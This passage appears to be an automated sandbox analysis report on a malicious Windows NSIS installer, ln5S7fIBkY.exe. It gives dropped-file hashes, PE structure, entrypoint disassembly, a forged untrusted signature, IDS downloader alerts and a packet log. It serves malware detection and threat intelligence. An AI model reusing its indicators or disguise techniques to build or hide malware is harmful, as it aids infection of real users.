Encrypted:	false
SSDEEP:	768:hcdhFKp23vdhctpU19YKVceNXiajgLRY2hLsKf/LTWSs9D1bFuYRiQHlWrmcZE+t:T9ogp/vuFYha+YI6vuAYskfI2ByWSlq
MD5:	BA41A53F0CE12BDF6DDE858C1BB56E67
SHA1:	28CC8982281E9540750800B87B128ACF3E86E1B4
SHA-256:	0DDFC3936461A4A299A8B57D2EE5A4C11B057233AE905D2EBBB3641E4D9FD0CE
SHA-512:	77DDDF113CB001D489B2B4B39E5E953B03A76D72EEABAB0C82FFA8C8E1677755A75740A98D32871CB086AE65B0BD2EEE1319BD87C59CC98169ECBE60EE83348E
Malicious:	false
Preview:	.............;......................0........;.......................jh<.i....................................................B................O.(...................................................................................M....6....................c.............................:............A.........................#............@...............................................................................I...........\..........................k..................................H.............................................................................1.......l....?.[....................)*....~..........K..................................................D..................U.a............................C........................................................................=.............o.........................g...............1.......s..H................y.................t....[.....................i..........'p.................................g.....................$......

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\kakaosmrs.txt

Download File

Process:	C:\Users\user\Desktop\ln5S7fIBkY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	4.234486179912683
Encrypted:	false
SSDEEP:	6:URWM/KBzGLFXivfRO5BViaS035LKlewERn62GFVhyzpFiqizhRc48RV1CnmMWIX+:UkgK4Lg3ROI0pLYT4Ahj3zKRV67WIXC7
MD5:	E514D8FDFF4A7AC568F2DED93DADB44E
SHA1:	DF81016124C8941F2D9F75B1BCB3D951F911626C
SHA-256:	687D18EA6077CE147AC2358AEF39F33119CC6C46A0A38C46AE444E75F595EE74
SHA-512:	E6E8734937C7F6CDF0FA3F25861A42CE31485555EF236B2922C0E90AA22C1B2D4BBB757AA13BF9C41948DAC261CF042565D2608074246000D479B143962B4CF3
Malicious:	false
Preview:	udkrystallisations kubong palisse duodesen raadighedsbelbene monoamino..hookman damperens varsel.endetarmsaabningens lection udvidelsestakts statometer diggers scandalized,ectocarpaceous carosella drattede stodderprinsen gingkoes,afvrgelsernes moravianized skotte.udsalgssteder fayal uafmrket svampelagenes mispronouncement forhaeng modemerne deskription..

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	678408
Entropy (8bit):	7.739883092097999
Encrypted:	false
SSDEEP:	12288:k2QJ9o2sW3B9o2G2/6SkwwOeO01ZAao2tezqrVcO5sZYw6bhyWjX53XOo:kv9o2sW3B9oV2iSkwwOe/U2HVcaNhyaH
MD5:	E38257F3EAA78E2DCA3C3063B05EAA70
SHA1:	250D9151F64818A8BFA51D3714A6DDB214303495
SHA-256:	4F0C13BF16B4E53B1513E2B268AEC15C6C2A043F88A58DEA69C88E25EB920853
SHA-512:	483DC9CBEF3E26973E0D51601B146472C64B0E2C95B0C98154BD5C2A49AFCE5B867E9ED56FD9ED9D9E939A0C9C023413AA775078B22873CE267DB55F2A7C1BCC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 62% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................?.....7N....@..........................................@=..\|.......... P...............................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........\|..............@....ndata........:..........................rsrc....\|...@=..~..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.739883092097999
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ln5S7fIBkY.exe
File size:	678'408 bytes
MD5:	e38257f3eaa78e2dca3c3063b05eaa70
SHA1:	250d9151f64818a8bfa51d3714a6ddb214303495
SHA256:	4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853
SHA512:	483dc9cbef3e26973e0d51601b146472c64b0e2c95b0c98154bd5c2a49afce5b867e9ed56fd9ed9d9e939a0c9c023413aa775078b22873ce267db55f2a7c1bcc
SSDEEP:	12288:k2QJ9o2sW3B9o2G2/6SkwwOeO01ZAao2tezqrVcO5sZYw6bhyWjX53XOo:kv9o2sW3B9oV2iSkwwOe/U2HVcaNhyaH
TLSH:	21E41249B240C5AFC6FAF93484A6EB58D4B77CB54C21494B32D43B89EEBE765680F403
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....

File Icon


Icon Hash:	397d694151710f3c

Static PE Info

General

Entrypoint:	0x40336c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Dacryagogue Embedsmandsvldet Unimpairable ", E=Unresidual@Raviv129.Mai, L=Saint-Trimo\xebl, S=Bretagne, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	01/01/2024 06:24:21 31/12/2026 06:24:21
Subject Chain	CN="Dacryagogue Embedsmandsvldet Unimpairable ", E=Unresidual@Raviv129.Mai, L=Saint-Trimo\xebl, S=Bretagne, C=FR
Version:	3
Thumbprint MD5:	C460A96C1AB51DCA34DAB22C5881BF64
Thumbprint SHA-1:	FF1CBB7C651BAC0F6508BA5145BED3255D9B2713
Thumbprint SHA-256:	9744D1CECD2B0227213922EA63CB5276512CC4B4CD94F7C6201E13BBB8FFA6DB
Serial:	4CCA096567133E030BBCA9C77451B4BF9A8E31E2

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A8A2Ch], eax
je 00007F805CAC0663h
push ebx
call 00007F805CAC3915h
cmp eax, ebx
je 00007F805CAC0659h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F805CAC388Fh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F805CAC063Ch
push 0000000Ah
call 00007F805CAC38E8h
push 00000008h
call 00007F805CAC38E1h
push 00000006h
mov dword ptr [007A8A24h], eax
call 00007F805CAC38D5h
cmp eax, ebx
je 00007F805CAC0661h
push 0000001Eh
call eax
test eax, eax
je 00007F805CAC0659h
or byte ptr [007A8A2Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [007A8AF8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d4000	0x27cc0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa5020	0x9e8	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6400	0x6400	eed0986138e3ef22dbb386f4760a55c0	False	0.6783203125	data	6.511089687733535	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	2914bac53cd4485c9822093463e4eea6	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb38	0x600	09e0c528682cd2747c63b7ba39c2cc23	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x2b000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d4000	0x27cc0	0x27e00	3ff3f9c979a556a14466f3e7fca5a16a	False	0.5468566320532915	data	6.448700520091383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d4448	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2851798178161599
RT_ICON	0x3e4c70	0xb85c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9977328587168404
RT_ICON	0x3f04d0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4055857345299953
RT_ICON	0x3f46f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.48091286307053943
RT_ICON	0x3f6ca0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6081144465290806
RT_ICON	0x3f7d48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5914179104477612
RT_ICON	0x3f8bf0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6864754098360656
RT_ICON	0x3f9578	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7044223826714802
RT_ICON	0x3f9e20	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.4371951219512195
RT_ICON	0x3fa488	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5173410404624278
RT_ICON	0x3fa9f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8156028368794326
RT_ICON	0x3fae58	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.5255376344086021
RT_ICON	0x3fb140	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.6418918918918919
RT_DIALOG	0x3fb268	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x3fb388	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3fb4a8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3fb570	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3fb5d0	0xbc	data	English	United States	0.648936170212766
RT_VERSION	0x3fb690	0x2f0	SysEx File - IDP	English	United States	0.4773936170212766
RT_MANIFEST	0x3fb980	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T16:02:40.162656+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49861	172.217.16.206	443	TCP
2025-01-10T16:02:44.961622+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49897	193.122.6.168	80	TCP
2025-01-10T16:02:46.586583+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49897	193.122.6.168	80	TCP
2025-01-10T16:02:47.164708+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49915	104.21.112.1	443	TCP
2025-01-10T16:02:47.867821+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49921	193.122.6.168	80	TCP
2025-01-10T16:02:48.406269+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49924	104.21.112.1	443	TCP
2025-01-10T16:02:49.686592+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49933	104.21.112.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:02:39.118305922 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.118366003 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:39.118490934 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.148956060 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.148978949 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:39.782370090 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:39.782444000 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.783541918 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:39.783607960 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.839663029 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.839679956 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:39.840023994 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:39.840081930 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.843044043 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:39.883337021 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:40.162657976 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:40.162718058 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:40.164222002 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:40.164264917 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:40.164273024 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:40.164464951 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:40.166613102 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:40.166629076 CET	443	49861	172.217.16.206	192.168.2.9
Jan 10, 2025 16:02:40.166637897 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:40.166676044 CET	49861	443	192.168.2.9	172.217.16.206
Jan 10, 2025 16:02:40.190700054 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:40.190742016 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:40.190895081 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:40.191169024 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:40.191179991 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:40.840873957 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:40.840986967 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:40.844942093 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:40.844959974 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:40.845257044 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:40.845356941 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:40.845704079 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:40.887366056 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.554507017 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.554718971 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.560446978 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.560560942 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.572968006 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.573082924 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.573088884 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.573327065 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.579253912 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.579323053 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.643048048 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.643121004 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.643168926 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.643177032 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.643197060 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.643280983 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.643531084 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.643779039 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.643785000 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.643975019 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.649981976 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.650113106 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.650119066 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.652434111 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.656167984 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.656260014 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.656266928 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.656315088 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.662389994 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.662677050 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.662683964 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.662777901 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.668603897 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.668915033 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.668921947 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.669172049 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.674913883 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.674968004 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.674985886 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.675152063 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.681174994 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.681349993 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.681355953 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.681690931 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.686973095 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.687025070 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.687033892 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.687180042 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.693825006 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.693875074 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.693882942 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.693938971 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.698512077 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.698631048 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.698637009 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.698775053 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.704289913 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.704432964 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.710840940 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.710952997 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.710958958 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.711081028 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.731882095 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.731946945 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.731952906 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.732006073 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.732021093 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.732029915 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.732053041 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.732095957 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.732183933 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.732234955 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.732256889 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.732312918 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.732543945 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.732595921 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.735228062 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.735294104 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.735305071 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.735327005 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.735343933 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.735373020 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.740611076 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.740704060 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.740710020 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.740761995 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.746136904 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.746198893 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.746220112 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.746294975 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.751146078 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.751229048 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.751236916 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.751329899 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.756072044 CET	443	49871	142.250.181.225	192.168.2.9
